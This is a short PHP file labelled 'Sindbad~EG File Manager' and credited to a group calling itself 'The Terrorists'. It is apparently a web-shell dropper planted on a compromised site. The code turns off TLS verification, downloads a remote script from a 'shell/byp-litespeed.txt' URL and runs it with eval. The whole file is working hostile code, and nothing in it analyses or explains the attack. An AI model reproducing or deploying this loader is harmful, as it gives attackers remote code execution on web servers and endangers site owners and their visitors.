Sindbad~EG File Manager
<?php
function getCurl0($url)
{
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
}
?>
<?=eval("?>".getCurl0("https://marslogs.co.id/shell/shell/byp-litespeed.txt")); __halt_compiler();?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists